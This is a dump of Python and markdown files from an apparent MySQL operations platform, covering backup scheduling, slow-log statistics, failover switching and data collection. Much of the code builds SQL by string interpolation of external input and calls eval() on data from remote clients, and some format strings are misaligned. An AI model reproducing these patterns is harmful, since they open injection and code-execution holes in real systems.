_t[7],_t[14],_t[16]\n )\n counts+=1\n un_data+='</table>'\n body=head+footer+body+str(data)+'</table>'+str(un_data)\n content=str(body)\n result,msg=SendMail(MODEL).sendmail(subject, content, temail)\n\n\ndef main():\n backup_report_daily()\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.6313725709915161, "alphanum_fraction": 0.6529411673545837, "avg_line_length": 19.440000534057617, "blob_id": "e662370712c6390485132c6079a92dc0966a1a39", "content_id": "fab46a7272ff6b13295fa062e3033a0c9c57c383", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 510, "license_type": "no_license", "max_line_length": 44, "num_lines": 25, "path": "/src/mega_web/entity/report.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Aug 18, 2014\n\n@author: xchliu\n\n@module:mega_web.entity.report\n'''\nfrom django.db import connection, models\n \nclass SlowLog(models.Model):\n class Meta(object):\n db_table='report_slowlog'\n \n id = models.AutoField(primary_key=True)\n instance_id=models.IntegerField()\n dbname=models.CharField(max_length=50)\n stattime=models.CharField(max_length=50)\n counts=models.IntegerField()\n \n\ndef main():\n return\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.5453044176101685, "alphanum_fraction": 0.5493156909942627, "avg_line_length": 36.486724853515625, "blob_id": "1addadc1a403aff1067626b7751392a861147750", "content_id": "ae227248a13fac068e5bfcc16ca5cb57de4da90f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12714, "license_type": "no_license", "max_line_length": 154, "num_lines": 339, "path": "/src/apis/manage.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "import types\nfrom mega_service.backup import Backuper\nfrom mega_service.slowlog.slow_log import SlowLog\nfrom mega_service.slowlog.slowlog_archive import slowlog_pack,slowlog_statics_per_hour\nfrom mega_service.task import Task\nfrom mega_service.resource import sync_baseinfo,sync_stat\nfrom mega_web.resource.instance_manage import InstanceGet\nfrom lib.logs import Logger\nfrom lib.PyMysql import PyMySQL\nfrom task import remote_cmd\n\nMODEL='API-manage'\nlog = Logger(MODEL).log()\n\n\n\ndef backup_routine(time=None,**args):\n instance_list=[]\n config_list=Backuper().backuper(time)\n for inst in config_list:\n inst_id=inst[0]\n inst_ip=inst[1]\n inst_port=inst[2]\n instance={\n 'id' : inst_id, \n 'host_ip' : inst_ip, \n 'port' : inst_port, \n 'db_type' : inst[3], \n 'backup_tool' : inst[4], \n 'backup_level': inst[5], \n 'level_value' : inst[6], \n 'backup_type' : inst[7], \n 'need_data' : inst[8], \n 'need_schema' : inst[9], \n 'Iscompressed': inst[10], \n 'isEncrypted' : inst[11], \n 'retention' : inst[12], \n } \n instance_list.append(instance)\n len_inst=len(instance_list)\n result=[]\n if len_inst>0:\n script=Task().get_task_by_name('backup')\n for instance in instance_list:\n result.append(remote_cmd(instance['host_ip'],instance['port'],script,'python',args=instance))\n len_result=len(result)\n if result:\n log.debug(result)\n if len_inst >0:\n log.debug(instance_list)\n if len_inst==len_result :\n log.info(\"%s backup tasks are invoked.\",len_inst)\n else:\n log.warn(\"%s backup tasks are invoked,%s are successed.\" %(len_inst,len_result))\n\ndef update_backupinfo(task_info,action='INSERT'):\n '''\n task_info : update items\n action: INSERT OR UPDATE \n \n return :\n task id : insert or update success\n False : unexpected errors occurs\n '''\n if not task_info :\n return False\n\n db_conn=PyMySQL()\n task=eval(str(task_info))\n if action.upper()=='INSERT':\n columns=\"host_ip,port,db_type,backup_tool,backup_level,level_value,backup_type,need_data,need_schema,status,rsync,message,backup_status,is_delete\"\n values=[]\n data=(columns,)\n for c in columns.split(','):\n _d=task.get(c)\n if _d:\n values.append(_d)\n else:\n values.append('')\n data=data+tuple(values)\n sql=\"insert into backup_history_info(%s)\\\n values('%s',%s,'%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s');\" % data \n db_conn.execute(sql)\n task_id=db_conn.fetchOne(\"select last_insert_id()\")\n log.debug(sql)\n log.debug(\"New backup task id : %s \" %task_id)\n return task_id\n else:\n id=task.get(\"id\")\n if not id:\n return False\n columns=\"status,is_delete,backup_begin_time,backup_end_time,rsync_begin_time,rsync_end_time,file_size,message,backup_status\"\n values=[]\n data=\"\"\n for c in columns.split(','):\n _d=task.get(c)\n if _d:\n data=data+c+\" = '\" + str(_d) + '\\' ,'\n data=data.rstrip(',')\n sql=\"update backup_history_info set %s where id=%s\" %(data,id)\n log.debug(sql)\n rows,msg=db_conn.execute(sql) \n if rows or rows==0:\n if msg:\n log.debug(msg)\n return id\n else:\n log.warn(\"Update task %s : \" % id +str(msg))\n return False\n return False\n\ndef add_slow_log(log_info):\n if not log_info:\n return False \n db_conn=PyMySQL()\n if not db_conn:\n log.error('Failed connect to db server!')\n return False\n task=eval(str(log_info))\n log.debug(task)\n if type(task) != types.DictionaryType:\n log.error('Failed to revert slow log data to dict !')\n return False\n columns=\"db_host,port,start_time,user,user_host,Query_time,lock_time,Rows_sent,Rows_examined,sql_text,sql_explained,dbname\"\n values=[]\n for c in columns.split(','):\n _d=task.get(c)\n if _d:\n _d='\"'+str(_d)+'\"'\n values.append(_d)\n else:\n values.append(\"''\")\n #todo \n #add proxy func \n table_name='slowlog_info'\n sql=\"insert into %s(%s) values(%s)\" %(table_name,columns,','.join(values))\n log.debug(sql)\n result,ex=db_conn.execute(sql)\n if result:\n task_id=db_conn.fetchOne(\"select last_insert_id()\")\n log.debug('New slow log task id: %s' % task_id)\n else:\n task_id=0\n log.error(ex)\n return task_id\n\ndef slowlog_routine(time=None):\n instance_list=[] \n config_list=SlowLog().get_slowlog_instance_list()\n log.debug(config_list)\n for conf in config_list:\n instance={\"id\":conf.get('id'),\n \"ip\":conf.get('ip'),\n \"port\":conf.get('port'),\n \"version\":conf.get('version')\n }\n instance_list.append(instance)\n inst_len=len(instance_list) \n result=[]\n if inst_len>0:\n script=Task().get_task_by_name('slowlog')\n for instance in instance_list:\n# log.debug(instance)\n result.append(remote_cmd(instance['ip'],instance['port'],script,'python',args=instance))\n if inst_len >0:\n log.debug(instance_list)\n if result:\n log.debug(result)\n log.info('%s instance slow log collect tasks are invoked.' % inst_len)\n\ndef slowlog_statics(time=None):\n #get the slow log in the prior hour \n #undo slow log\n sql=\"select * from slowlog_info where stat=0 limit 100\" \n while 1:\n try:\n conn=PyMySQL()\n cursor=conn.query(sql, type='dict')\n if not cursor:\n break\n data_list=cursor.fetchall()\n if not data_list or len(data_list)==0:\n log.warn('None slow log found!')\n break\n log.info('%s slow log will be computed.' % len(data_list))\n #add hash_code and instance to each log\n for data in data_list: \n sql_hash=slowlog_pack(data.get('sql_text'))\n instance_id=InstanceGet().get_instance_by_ip_port(data.get('db_host'), data.get('port'))\n if not instance_id:\n log.warn('Unknown Instance: %s' %([data.get('db_host'), data.get('port')]))\n instance_id=0\n else:\n instance_id=instance_id[0]['id']\n _sql=\"update slowlog_info set hash_code='%s',instance_id=%s,stat=1 where id = %s\" %(sql_hash,instance_id,data.get('id'))\n result,ex=conn.execute(_sql)\n if not result:\n log.error(ex)\n conn.close()\n except Exception as ex:\n log.debug(data)\n log.error('Pack slow log failed:%s' % ex)\n break\n # do the hourly statics \n try:\n slowlog_statics_per_hour(time)\n except Exception as ex:\n log.error('Statics slow log hourly failed:%s' % ex) \n\ndef update_ha_info(new_master,old_master):\n '''\n switch the role inside a ha group\n master format:'1.1.1.1:3306' \n '''\n log.info('swith master role from %s to %s' % (old_master,new_master))\n try:\n _new_host,_new_port=new_master.split(':')\n _old_host,_old_port=old_master.split(':')\n _new_instance_id=InstanceGet().get_instance_by_ip_port(_new_host, _new_port)\n _old_instance_id=InstanceGet().get_instance_by_ip_port(_old_host,_old_port)\n if not _old_instance_id: \n log.error('Instance not found' % _old_instance_id )\n return False \n if not _new_instance_id:\n log.error('Instance not found' % _new_instance_id )\n return False \n _new_instance_id=_new_instance_id[0].get('id')\n _old_instance_id=_old_instance_id[0].get('id') \n _new_instance=InstanceGet().get_instance_by_id(_new_instance_id)\n #if the new master is master already,return false\n if _new_instance.get('role') == 1:\n log.warn(\"Instance %s is already master!\" % new_master)\n return False\n if _new_instance.get('master_id') == _old_instance_id:\n #change the master id for the slaves\n sql=\"update instance set master_id=%s where master_id=%s\" %(_new_instance_id,_old_instance_id)\n result,ex=PyMySQL().execute(sql)\n if not result:\n return False \n log.error(ex)\n #change the old master stat\n sql=\"update instance set master_id=%s,role=2 where id=%s\" %(_new_instance_id,_old_instance_id)\n result,ex=PyMySQL().execute(sql)\n if not result:\n return False \n log.error(ex)\n #change the new master role\n sql=\"update instance set role=1 where id=%s\" %(_new_instance_id)\n result,ex=PyMySQL().execute(sql)\n if not result:\n return False \n log.error(ex) \n else:\n log.error(\"%s 's master id is %s ,not %s\" %(new_master,_new_instance.get('master_id'),_old_instance_id)) \n except Exception as ex: \n log.error('update ha info failed:%s' % ex)\n return False\n return True\n\ndef data_collect(time=None):\n '''\n collect the base info and performance data from all the online instance which data collect configuration is on\n type:\n base: collect the basic information for the instance ,will be called one time per day\n stat: collect the status infomation \n '''\n #\n type=\"base\"\n result=[] \n instance_list=[]\n if time:\n if int(time.split(\":\")[0]) == 0:\n type=\"stat\" \n filter={'i.stat':1,'i.data_collect':1}\n config_list=InstanceGet().get_instance_list(filter, 0)\n for conf in config_list:\n instance={\"ip\":conf.ip,\n \"port\":conf.port,\n \"type\":type \n }\n instance_list.append(instance)\n if len(instance_list):\n log.debug(instance_list)\n script=Task().get_task_by_name('datacollect')\n for instance in instance_list:\n result.append(remote_cmd(instance['ip'],instance['port'],script,'python',args=instance))\n if result:\n log.debug(result)\n log.info(\"%s instance data collect task are invoked.\" % len(instance_list)) \n\ndef data_collect_save(data):\n '''\n parse the data collect from the client script,split the values by the keys\n \n keys:\n base=['variables','table_status','mysql_user','db_name','base']+['timestamp']+['except']\n state=['status','slave_status']+['timestamp']+['except'] \n '''\n # pre-check for safe and translate the str to a dict\n _keys=['variables','table_status','mysql_user','db_name','base','timestamp','except','status','slave_status']\n try:\n data=eval(str(data))\n if type(data) != types.DictionaryType:\n log.warn('Inexpectant data format as type of the data is %s' % type(data))\n return False \n #get instance id\n instance=data.keys()[0]\n ip,port=instance.split(\":\")\n instance_id=InstanceGet().get_instance_by_ip_port(ip, port)\n if not instance_id:\n log.error('Failed to get instance id for %s:%s' % (ip,port)) \n return False \n instance_id=instance_id[0]['id']\n instance_data=data.get(instance)\n #caught the exception return by the script\n script_except=instance_data.pop('except',None)\n if type(instance_data) != types.DictionaryType:\n log.error(\"Invalid data format for %s\" % instance)\n return False\n if script_except:\n log.warn(\"Data collect on %s : %s\" % (instance,script_except))\n #save the data into database \n collect_time=instance_data.pop('timestamp',None)\n _sync=sync_baseinfo.SyncBasic(instance_id,instance,collect_time)\n for _k in _keys: \n if instance_data.get(_k):\n _sync.sync_base(instance_data.pop(_k),_k) \n except Exception as ex:\n log.error(ex)\n return False\n return True\n \n\n \ndef main():\n return\n\nif __name__ == \"__main__\":\n main() " }, { "alpha_fraction": 0.35559922456741333, "alphanum_fraction": 0.3614931106567383, "avg_line_length": 23.261905670166016, "blob_id": "282a9d7defae43301101525832ca3bed557dae2f", "content_id": "43ced9ebd8d134a816215e320b8592458e224837", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1018, "license_type": "no_license", "max_line_length": 65, "num_lines": 42, "path": "/src/mega_web/charts/visit.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jul 4, 2014\n\n@author: xchliu\n\n@module:mega_web.charts.visit\n'''\nfrom mega_web.entity.models import Server\nfrom chartit import DataPool, Chart\n\ndef Visit(request):\n weatherdata = \\\n DataPool(\n series=\n [{'options': {\n 'source': Server.objects.all()},\n 'terms': [\n 'id',\n 'ip'\n ]}\n ])\n \n cht = Chart(\n datasource = weatherdata,\n series_options =\n [{'options':{\n 'type': 'line',\n 'stacking': True},\n 'terms':{\n 'ip': [\n 'id'\n ]\n }},\n ],\n chart_options =\n {'title': {\n 'text': 'Weather Data of Boston and Houston'},\n 'xAxis': {\n 'title': {\n 'text': 'Month number'}}})\n return cht" }, { "alpha_fraction": 0.6203492879867554, "alphanum_fraction": 0.6332573890686035, "avg_line_length": 27.88888931274414, "blob_id": "07439472ecfbabe0a2e047be5bb5f8b24353852e", "content_id": "fa6b4252373a44a27e8cfd1a9690530a2396f22b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1317, "license_type": "no_license", "max_line_length": 105, "num_lines": 45, "path": "/src/mega_web/lib/meta_data.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "'''\nCreated on Jul 1, 2014\n\n@author: xchliu\n'''\nfrom conf import GlobalConf\nfrom mega_web.resource import business_manage,user_manage,instance_manage,vip_manage,server_manage\n\nclass MetaData(object):\n '''\n classdocs\n '''\n def __init__(self):\n '''\n Constructor\n '''\n db_type=GlobalConf.DB_TYPE\n ha_type=GlobalConf.HA_TYPE\n level=GlobalConf.LEVEL\n version=GlobalConf.VERSION\n os=GlobalConf.OS\n failover_method=GlobalConf.FAILOVER\n plant_list=GlobalConf.PLANT\n\n def business_list(self):\n return business_manage.BusinessGet().get_business_list(None,count=1000).values()\n \n def owner_list(self):\n return user_manage.UserGet().get_user_list(None,count=0)\n \n def instance_list(self,filter=None):\n return instance_manage.InstanceGet().get_instance_list(filter,count=0) #.values(\"id\",\"ip\",\"port\")\n\n def vip_list(self,type=None):\n wvips=vip_manage.VipGet().get_vip_list(count=0)\n rvips=vip_manage.VipGet().get_vip_list(type=2,count=0)\n if type==1:\n return wvips\n elif type == 2:\n return rvips\n else:\n return list(wvips)+list(rvips)\n \n def server_list(self,filter=None):\n return server_manage.ServerGet().get_server_list(filter,count=0)\n \n " }, { "alpha_fraction": 0.5467349290847778, "alphanum_fraction": 0.5486555695533752, "avg_line_length": 32.956520080566406, "blob_id": "aa8357be52deaa89298de9ed064f981e3acbedd9", "content_id": "7898427921bf76f835c26422eeba52d43db455c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1562, "license_type": "no_license", "max_line_length": 160, "num_lines": 46, "path": "/src/mega_service/backup.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "import time\nfrom lib.logs import Logger\nfrom mega_web.entity.models import Backup_Policy\nfrom lib.PyMysql import PyMySQL\n\nMODEL='BACKUP'\nlog=Logger(MODEL).log()\n\nclass Backuper():\n def __init__(self):\n self.backup_policy=Backup_Policy\n self.q=PyMySQL()\n def backuper(self,now=None):\n '''\n retrun the server list which need to run backup right now\n '''\n if not now:\n now=time.strftime('%H:%M',time.localtime(time.time()))\n server_list = self.get_task(now)\n return server_list\n\n def get_task(self,now):\n #daily ,weekly,monthly\n _data=[]\n _now={}\n _now[\"day\"]=time.strftime('%H:%M',time.localtime(time.time()))\n _now[\"week\"]=time.strftime('%a',time.localtime(time.time()))\n _now[\"month\"]=time.strftime('%d',time.localtime(time.time()))\n for _n in _now:\n if _n == 'day': \n sql=\"select * from backup_policy where cycle='%s' and schedule_time='%s' and is_schedule=1\" %(_n,now)\n else:\n sql=\"select * from backup_policy where cycle='%s' and find_in_set('%s',backup_time) and schedule_time='%s' and is_schedule=1\" %(_n,_now[_n],now)\n #_d=self.backup_policy .objects.raw(sql)\n _d=self.q.fetchAll(sql)\n for _ob in _d:\n _data.append(_ob)\n if len(_data)>0:\n log.debug('Get backup task:')\n log.debug(_data)\n return _data\n \n def push_task(self):\n pass\n def log_task(self):\n pass\n" }, { "alpha_fraction": 0.6258351802825928, "alphanum_fraction": 0.6458797454833984, "avg_line_length": 23.77777862548828, "blob_id": "c82a196d4b6547af9e5371a28ef6baff939b555b", "content_id": "6aa1f849fa4e0d298cb3e52cfb80d2f754168b8a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 631, "license_type": "no_license", "max_line_length": 74, "num_lines": 18, "path": "/docs/bugs.md", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "\n#Created on Jul 7, 2014\n\n@author: xchliu\n\n## 备份重复发起\n由于时间临界点问题,导致一个备份在一次调用中2次运行,上一分钟59秒tracker 获取任务,下一秒进入api调用时使用下一分钟时间,则造成2次调用\n\n修复:\n\t\n\ttracker 获取任务并获取当前时间,作为参数传送给具体参数\n\t def backuper(self,now=None):\n '''\n retrun the server list which need to run backup right now\n '''\n if not now:\n now=time.strftime('%H:%M',time.localtime(time.time()))\n server_list = self.get_task(now)\n return server_list\n\n\n" }, { "alpha_fraction": 0.5675050020217896, "alphanum_fraction": 0.570135772228241, "avg_line_length": 39.61538314819336, "blob_id": "b672488225ac2c55a1acc7fd4b7f922678c92fe3", "content_id": "ec87842cf725fd03494f0e0828f4fb75c27ffe29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9507, "license_type": "no_license", "max_line_length": 226, "num_lines": 234, "path": "/src/mega_web/console/failover.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Sep 2, 2014\n\n@author: xchliu\n\n@module:mega_web.console.failover\n'''\nfrom lib.utils import now\nfrom lib.PyMysql import PyMySQL\nfrom apis.task import remote_cmd\nfrom conf.GlobalConf import MSG_ERR_SERVER_EXITST,MSG_ERR_NAME\nfrom mega_web.resource.instance_manage import InstanceGet\n\nfrom lib.logs import Logger\n\nMODEL='web-failover'\nlog=Logger(MODEL).log()\n\nclass FailoverManage():\n '''\n '''\n def __init__(self,request):\n self.q=PyMySQL()\n if request:\n self.name=request.get('name')\n self.type=request.get('type')\n self.wvip=request.get('wvip')\n self.rvip=request.get('rvip')\n self.master=request.get('master')\n self.manager=request.get('manager')\n self.id=request.get('id') \n \n def _data_check(self):\n if not self.name:\n return False\n if not self.rvip:\n self.rvip=0\n return True\n \n def _check_ifexist(self):\n sql=\"select id from failover where name='%s'\" % self.name\n id=self.q.fetchOne(sql)\n if id:\n return id\n return False\n \n def add_failover(self):\n if not self._data_check():\n return False,MSG_ERR_NAME\n if self._check_ifexist():\n return False,MSG_ERR_SERVER_EXITST\n sql=\"insert into failover(name,master,manager,rvip,wvip,type) values('%s',%s,%s,%s,%s,%s)\" %(self.name,self.master,self.manager,self.rvip,self.wvip,self.type)\n print sql\n result,ex=self.q.execute(sql)\n if not result:\n return False,ex\n return True,''\n \n def mod_failover(self):\n if not self._data_check():\n return False,MSG_ERR_NAME\n id=self._check_ifexist()\n if not self.id or not id:\n return False,'NOT FOUND'\n if int(id)!=int(self.id):\n return False,MSG_ERR_SERVER_EXITST\n sql=\"update failover set name='%s',master=%s,manager=%s,rvip=%s,wvip=%s,type=%s where id=%s\" %(self.name,self.master,self.manager,self.rvip,self.wvip,self.type,self.id)\n result,ex=self.q.execute(sql)\n if not result:\n return False,ex\n return True,''\n def change_master(self,failoverid,new_master,method):\n ''' \n usage: python mha_switch.py --group=xx --old_master=ip:port --new_master=ip:port --type=xx --record=xx\n '''\n cmd='mha_switch.py'\n cmd_type='python'\n sql='select s.name,s.ip,master from failover f ,server s where f.manager=s.id and f.id=%s' %failoverid \n (group,ip,old_master)=self.q.fetchRow(sql)\n #data=self.q.fetchRow(sql)\n _old=InstanceGet().get_instance_by_id(old_master)\n _new=InstanceGet().get_instance_by_id(new_master)\n _old_m=\"%s:%s\" %(_old.get('ip'),_old.get('port'))\n _new_m=\"%s:%s\" %(_new.get('ip'),_new.get('port'))\n record_id=self.add_failover_record(failoverid, method,_old_m,_new_m)\n self.add_failover_record_detail(record_id, 'mega',now(),0, 'Y', 'Start the switch task.')\n args=\"--group=%s --old_master= --new_master=%s:%s --type=%s --record=%s\" %(group,_old_m,_new_m,method,record_id)\n #group name ,old master ,new master,action\n result=remote_cmd(ip,None,cmd,cmd_type,args)\n if result == 0:\n self.stat_failover_record(record_id, 'Failed')\n self.add_failover_record_detail(record_id, 'mega',now(),0, 'Y', 'End the task as failed to call remote script')\n return False\n else:\n self.add_failover_record_detail(record_id, 'mega',now(),0, 'Y', 'Call the remote script on %s' % ip)\n return True\n \n def add_failover_record(self,failover_id,method,old_master,new_master,failover_name=None):\n '''\n 1.add a failover record with a given failover id --used for mega web site\n 2.add record with a failover group name --used for command line ha switch\n \n return :\n None: failed to get the new record\n id(int): the new record for failover switch\n '''\n if not failover_id:\n if not failover_name:\n return None\n else:\n sql=\"select id from failover where name='%s'\" % failover_name \n failover_id=self.q.fetchOne(sql)\n sql=\"insert into failover_record (failover_id,method,re_time,old_master,new_master,result) values(%s,'%s',now(),'%s','%s','Running')\"\\\n %(failover_id,method,old_master,new_master)\n result,ex=self.q.execute(sql)\n if result:\n record_id=self.q.fetchOne(\"select last_insert_id()\")\n else:\n log.error(ex)\n record_id=None\n return record_id\n \n def stat_failover_record(self,record_id,stat='Y'):\n '''\n 1.stat the result for a switch task\n return :\n True | False\n\n '''\n if not record_id:\n return None\n sql=\"update failover_record set result='%s' where id=%s\" % (stat,record_id)\n result,ex= self.q.execute(sql)\n if not result :\n log.error(ex)\n return False\n else:\n return True\n \n def add_failover_record_detail(self,record_id,module,re_time,time_used,result,content):\n '''\n record_id ,get from the function add_failover_record()\n 1.if task invoked by mega, the id will be given\n 2.if task begins from the command line, call the add_failover_record() and get the new record id \n befor add new detail logs\n return :\n True | False\n '''\n if not record_id:\n return False \n sql=\"insert into failover_record_detail(record_id,module,re_time,time_used,result,content) \\\n values(%s,'%s','%s',%s,'%s','%s');\" %(record_id,module,re_time,time_used,result,content)\n result,ex=self.q.execute(sql)\n if not result :\n log.error(ex)\n return False\n else:\n return True\n \nclass FailoverGet():\n '''\n '''\n def __init__(self):\n self.q=PyMySQL()\n \n def get_failover_list(self,ip=None):\n \n sql='''select f.id as id,f.name as name,f.type as type,i.id as instance_id,concat(i.ip ,':',i.port) as master,s.id as server_id,s.ip as manager,v.id as rvip_id,v.vip as rvip,\n v2.id as wvip_id,v2.vip as wvip, f.last_time from failover f left join instance i on f.master=i.id left join server s on f.manager=s.id left join vip v on f.rvip=v.id left join vip v2 on f.wvip=v2.id where 1=1 '''\n if ip :\n sql+=\"and v.vip='%s' or v2.vip='%s'\" % (ip,ip)\n failover_list=self.q.query(sql, type='dict')\n return failover_list\n \n def get_failover_by_id(self,id):\n if not id:\n return None \n sql=\"select a.name,concat(b.ip,':',b.port) as old_master,c.vip as rvip,d.vip as wvip from failover a left join instance b on \\\n a.master=b.id left join vip c on a.rvip=c.id left join vip d on a.wvip=d.id where a.id=%s;\" % id\n return self.q.query(sql, type='dict').fetchone()\n def get_failover_by_master(self,master_id):\n sql=\"select a.*,b.ip as manager_ip,c.vip as rvip_ip,d.vip as wvip_ip from failover a left join server b on a.manager=b.id \\\n left join vip c on a.rvip=c.id left join vip d on a.wvip=d.id where master=%s;\" % master_id\n return self.q.query(sql, type='dict').fetchone()\n\n def get_failover_history(self,id): \n if not id:\n return None \n sql=\"select * from failover_record where failover_id=%s order by id desc\" %id\n return self.q.query(sql, type='dict').fetchall()\n \n def get_failover_history_detail(self,record_id,failover_id=None):\n if not record_id:\n if not failover_id:\n return None\n else: \n record_id=self.get_newest_record(failover_id)\n sql=\"select * from failover_record_detail where record_id=%s order by id desc \" %record_id\n return self.q.query(sql, type='dict').fetchall()\n\n def get_newest_record(self,failover_id):\n sql=\"select max(id) from failover_record where failover_id=%s\" %failover_id\n return self.q.fetchOne(sql)\n\n def get_failover_result(self,record_id): \n if not record_id:\n return {}\n sql=\"select result from failover_record where id=%s\" %record_id\n return self.q.query(sql, type='dict').fetchone()\n \n def get_instance_failover(self,instance_id):\n instance=InstanceGet().get_instance_by_id(instance_id)\n if not instance:\n return []\n if instance.get('role') == 1:\n master=instance\n slaves=InstanceGet().get_instance_slaves(instance_id)\n else:\n master=InstanceGet().get_instance_slaves(instance.get('master_id'))\n if master:\n master=master[0]\n slaves=InstanceGet().get_instance_slaves(master.get('id'))\n else:\n slaves=[]\n failover=self.get_failover_by_master(master.get('id'))\n group=[master]+list(slaves)\n return {'failover':failover,'group':group}\n \ndef main():\n return\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.47226443886756897, "alphanum_fraction": 0.615121603012085, "avg_line_length": 13, "blob_id": "5b261e3d542db7dd691fa7e1d8b8399043b78f50", "content_id": "6735ada139ce15e278ef4c7562e903735d5fa465", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4644, "license_type": "no_license", "max_line_length": 52, "num_lines": 188, "path": "/docs/tasklist.md", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "#Task List\n\n* 全局架构设计\n* 规范设计\n* 模块切分,功能设计\n\n#Sub List\n* 项目初始化 2014-05-08\n\t* 部署规范\n\t\t* 初始化 2014-06-20\n\t\t* 分离开发和线上环境\n\t\t* 增加uwsgi服务作为web服务\n\t* deamon 服务 \n\t\t* start stop restart 2014-06-23\n\t\t* 线程管理\n* 规范流程\n\t* 代码规范文档\n\t* 注释规范\n\t* 接口规范\n\t* 测试用例规范\n\t* 公用类调用规范\n\t\t* 日志类\n\t\t* 公用函数\n\t\t* model\n\t\t* 页面模板(html)\n* 主体流程实现\n\t* url 规划及跳转 2014-05-26\n* 资源池管理 2014-05-12\n\t* 基本信息维护,实例,数据库,服务器,数据库 2014-05-13\n\t* 页面设计\t2014-05-14\n\t* 相关接口开发\t2014-05-19\n\t\t* 资源池接口开发及测试用例 2014-05-21 完成开发和部分测试用例\n\t\t* 资源池接口测试及测试用例 \n\t* 录入数据有效性验证 2014-05-15 \n\t* 元数据管理关系建立 2014-05-16\n\t* 编辑功能异常捕获 \n\t* 用户管理 2014-06-26\n\t* 页面功能调整 2014-07-02\n\t\t* 所有页面搜索功能实现 2014-07-03\n\t\t* 分页实现\n\t\t* 联想输入\n\t* 增加快捷导航栏\n\t* 增加实例版本号 2014-07-16\n\t* 增加全局元数据管理模块\n\t\t* 维护页面\n\t\t* 数据表设计\n\n\t* 增加服务器域名管理 2014-07-25\n\t* 增加实例高可用组维护\n\n* 服务层整体框架规划\n\t* 主体流程设计,2014-05-27\n\t\t* 任务相关表建立\n\t\t* 数据流规划\n\t* 主体逻辑实现 2014-05-29\n\t\t* tcp 监听 2014-05-28\n\t\t* 消息队列维护设计 \n\t\t* 任务捕获及解析\n\t\t* 任务执行\n\t* 任务调度模块\n\t\n\t* TCP 服务端设计\n\t\t* TCP 通信数据包协议 2014-5-30 \n\t\t* sender client 功能 2014-06-05 完成通信接口,确定client 代码\n\t\t* listener 功能 2014-06-05 功能完善,通信协议修改\n\t* TCP 发送端及发送接口\n\t* 测试模块\n\t* 服务层api\n* 日志模块\n\t* 统一日志入口 2014-06-03\n\t* 日志接口调用规范\n\t* 服务层日志调整\n\t\n* 备份调度 gxg,xchliu\n\t* 备份整体调度流程确认 2014-06-06\n\t* 后台tracker流程设计 2014-06-17\n\t* 备份相关数据表设计 \n\t* 备份规则确认\t2014-06-17\n\t* 测试用例\t2014-06-18\n\t\t* salt 联调 2014-06-20\n\t* 页面设计 2014-06-09 10 \n\t\t* 备份状态信息 2014-06-12\n\t\t* 备份配置管理 2014-06-13\n\t\t* 增加度配置浏览页面 \n\t* 备份资料库更新接口 2014-06-18\n\n\t* 解除salt 依赖 2014-07-28\n\t\t* sender 增加监听\n\t\t* 备份任务调度策略更新\n\t\t* 联调\n\t* 备份恢复\n\t\t* 日常恢复测试\n\t\t* 定点恢复\n\t\n* 慢查询分析统计\n\t* 需求收集,功能规划 2014-07-14\n\t* 元数据定义\t\t2014-07-15\n\t* 接口\t\t2014-07-15\n\t\t* 接口开发\n\t\t\t* tracker 周期任务调度 2014-07-16\n\t\t* 接口调试\t\t\n\t* 慢查询收集脚本\t\n\t* sql 解析实现 2014-07-21\n\t\n\t* 模块文档\n\t* 统计分析\n\t\t* 确定统计项\n\t\t* 后台统计任务调度\n\t\t\t* 统计表设计\n\t\t\t* 统计项维度\n\t* 页面开发\n\t\t* 统计报表\n\t* 基于实例维度的统计\n\t\t* 实例慢查询趋势\n\t\t* 实例top sql\n\t\t* 实例中db占比\n\t* 基于sql维度统计\n\t\t* sql的来源\n\t\t* sql基于时间的次数变化\n\t\t* sql优化前后的对比\n\t* top sql根据优化状态排序\n\t* top 增加时间维度查询\n\t\n\t\n* 任务调度\n\t* 任务调度管理(list,增加,修改) 2014-08-04\n\t\t* 页面开发\n\t\t* 后台api开发\n\t\t\n\t* 远程任务调度实现\t\n\t\t* 定制任务执行流程\n\t\t* 远程调用接口\n\t\t* 任务执行状态更新\n\t\t* 本地调试\n\t\t\n* mega 工具包\n\t* 集成方法调研\n\t* 集成sender\n\t* 集成conn,sendmail \t\t\n\n* mega-client \n\t* sender \n\t* 增加监听功能 2014-7-29\n\t* client自动升级功能 2014-07-30\n\t* 增加部署功能 2014-07-31\n\t* 增加文件传输\n\t* 增加系统命令调用\n\t* 客户端管理\n\t\t* 状态监测\n\t\t* 管理页面\n\t* client 服务daemon 重构 2014-08-14\n\t* client 部署\n\n* 传送门\n\t* 增加文档上传下载 2014-02-29\n\n* 用户管理\n\t* 用户维护\n\t* 权限维护\n* 高可用管理\n\t* mha 集成 2014-10-14 \n\t\t* vip 管理\n\t\t* 高可用组信息的维护\n\t\t* 切换调度模块\n\t\t* 切换过程信息\n\t\t* 主从关系更新接口\t \n\t\n\t* oracle 高可用\n\t* 切换测试\n\t\n* 系统统计分析\n\t*增加各页面点击统计,增加快捷功能\n\t*增加任务调度统计,\n\n* 基本信息收集 2014-10-22\n\t* 确认信息收集流程\n\t* 信息收集接口开发\n\t* 